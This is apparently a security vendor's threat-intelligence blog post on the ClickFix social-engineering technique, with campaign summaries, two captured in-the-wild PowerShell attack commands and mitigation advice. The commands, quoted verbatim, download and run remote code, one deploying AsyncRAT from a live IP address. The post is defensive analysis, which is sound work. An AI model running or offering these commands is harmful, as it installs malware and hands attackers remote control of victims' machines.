ClickFix: The rising threat of social engineering through fake fixes

Attackers are always crafting new methods to bypass security measures and exploit human behavior. One of these new methods, known as ClickFix, has gained traction in recent months.

Field Effect has observed signs of this emerging threat in its own telemetry, with attackers actively testing this approach across different industries. In each case, the attack was rapidly blocked.

ClickFix is a social engineering tactic that manipulates users into executing malicious actions under the guise of troubleshooting or system maintenance. By presenting fake error messages, CAPTCHA verifications, or system prompts, attackers convince users to take actions that compromise their devices, often by manually copying and pasting malicious commands into the command line.

How ClickFix works

The term ClickFix describes this attack’s core deception: convincing users to click on links or execute commands they believe will resolve a fictitious system issue presented to them by threat actors masqueraded as trusted services, like Google Meet, Booking.com, or even IT support teams.

These fake system issues are delivered to targets via phishing emails, pop-up alerts, or misleading system messages. These delivery methods invoke a sense of urgency, leading users to unknowingly disable security controls, download malware, or grant attackers remote access.

A particularly dangerous aspect of ClickFix is when threat actors instruct users to manually copy and paste malicious code into command-line interfaces like PowerShell (Windows) or Terminal (Mac/Linux).

Because modern security solutions often block automated malware downloads, threat actors can bypass these security controls by socially engineering users into manually executing the commands themselves. If successful, threat actors gain the same level of system access as the victim, which can lead to data theft, credential compromise, or full system takeover.

Image 1: Fake error message instructing user to copy code and execute it in PowerShell (Source: blog.sucuri.net)

Another alarming variation of the ClickFix tactic involves fake IT troubleshooting prompts. In recent attacks, users saw pop-ups instructing them to run PowerShell commands to "fix" a browser issue or re-enable account access.

In reality, these commands executed scripts that downloaded spyware or established backdoors for remote access.

Recent surge in ClickFix exploitation

Cybersecurity researchers have seen a sharp increase in ClickFix-based attacks since late 2024. Two prominent campaigns highlight the growing use of this method:

1. OBSCURE#BAT campaign – This campaign targeted English-speaking users in the U.S., Canada, Germany, and the U.K., using fake CAPTCHA verification pages. Victims were directed to seemingly legitimate Cloudflare CAPTCHA pages, where they were tricked into copying and running a malicious batch script that installed malware.
2. Storm-1865 phishing campaign – In this campaign, attackers impersonated Booking.com to target the hospitality industry in North America, Europe, and Asia. Emails claimed that businesses received a negative guest review, urging them to click a fraudulent link or open a PDF attachment. Victims who followed the instructions inadvertently exposed themselves to credential theft and malware infection.

Our team has seen an uptick in attempted ClickFix-style attacks in our own telemetry as well.

In one case, an employee of a North America-based non-profit was targeted by a ClickFix-style attack that attempted to trick the user into executing the following command:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h -c '$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'

This is a PowerShell command designed to stealthily download and execute a remote script. It first launches PowerShell in hidden mode to prevent users from noticing its execution. Then, it generates a timestamp-based identifier using the current Unix time, possibly to create a unique request for tracking or obfuscation. The command proceeds to retrieve a script from a remote server (138.199.161[.]141:8080) using Invoke-RestMethod (irm) and immediately executes it with Invoke-Expression (iex).

However, because the URL includes a dynamic timestamp, each request appears unique which makes it harder for security tools to detect and block. The script is configured to deploy AsyncRAT on the victim’s machine. AsyncRAT is a powerful open-source remote access tool (RAT) designed for stealthy surveillance, keystroke logging, credential theft, and remote control of infected systems, often used by threat actors for persistent backdoor access.

IP address 138.199.161[.]141 is a German-based IP address that, according to Virus Total, has only been deemed malicious by one security vendor.

Image 2: Virus Total analysis of IP 138.199.161[.]141

In a second attempted attack seen in Field Effect telemetry, an unknown threat actor tried to socially engineer an employee of a Canadian construction company into executing the following command:

'C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe' -W Hidden iwr -Uri 'https://overtimeforus[.]com/dow' -O $env:PUBLIC\\abc.msi;start $env:PUBLIC\\abc.msi # I am not a robot: Cloudflare Verification ID: 12Z-51P

This second PowerShell command is designed to silently download and execute a malicious MSI (Windows Installer) file. It first launches PowerShell in hidden mode (-W Hidden) and uses Invoke-WebRequest (iwr) to download a file from https[:]//overtimeforus.com/dow and saves it as abc.msi in the system’s public directory ($env:PUBLIC).

Once the download is complete, the command automatically executes the MSI file (start $env:PUBLIC\\abc.msi). This would likely install malware or backdoor on the system but unfortunately, we weren’t able to retrieve the specific file to fully identify it.

The presence of a fake Cloudflare verification comment (# I am not a robot: Cloudflare Verification ID: 12Z-51P) suggests an attempt to disguise the script as a legitimate process, potentially tricking users into believing it's a security measure.

The URL contained in the second command, https[:]//overtimeforus.com/dow, has been deemed malicious by 10 security vendors on Virus Total.

Image 3: Virus Total analysis of https[:]//overtimeforus.com/dow

Conclusion

The ClickFix technique is a prime example of threat actors blending social engineering with technical deception to bypass security measures. By convincing users to execute malicious code themselves, attackers can evade traditional malware defenses and gain direct access to systems.

The best defense against this rising threat, and many others, is a multi-layered approach—restricting script execution, leveraging MDR solutions, and educating users about the risks of manually entering commands.

Organizations that take these steps will be better equipped to detect, prevent, and mitigate ClickFix-style attacks before they cause serious damage.

Mitigation

Protecting against ClickFix attacks requires a combination of technical security measures and user education. Field Effect recommends that organizations consider implementing the following defenses to mitigate the threat the ClickFix attack vector poses:

Restrict command line use

• Enforce policies that limit PowerShell, Terminal, and CMD execution for non-administrative users.
• Disable the ability to run scripts from untrusted sources and configure PowerShell execution policies to block unauthorized commands.

Deploy advanced threat detection solutions

• Managed detection and response (MDR) services, such as Field Effect MDR, provide continuous monitoring and rapid identification of unusual command execution patterns.
• Behavioral analysis tools can detect and flag suspicious user actions, such as copying commands from a browser into the command line.

Enhance email and web filtering

• Block phishing emails that attempt to trick users into running malicious scripts (Field Effect MDR users can always use our built-in Suspicious Email Analysis Service to have one of our experts verify the validity of an email they deem suspicious).
• Use sandboxing to inspect attachments and links before allowing them into inboxes.

Train users to recognize ClickFix tactics

• Employees should be skeptical of unexpected troubleshooting instructions and never input any code into the command line prompt or PowerShell.
• IT teams should regularly conduct phishing simulations to test and reinforce user awareness.

Maintain up-to-date security measures

• Regularly update software and security policies to reduce exposure to known attack techniques.
• Conduct vulnerability assessments to identify potential weaknesses before attackers do.

Indicators of compromise

If you have any questions or comments regarding this analysis, please contact us.

Stay on top of emerging threats.

Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.

Sign up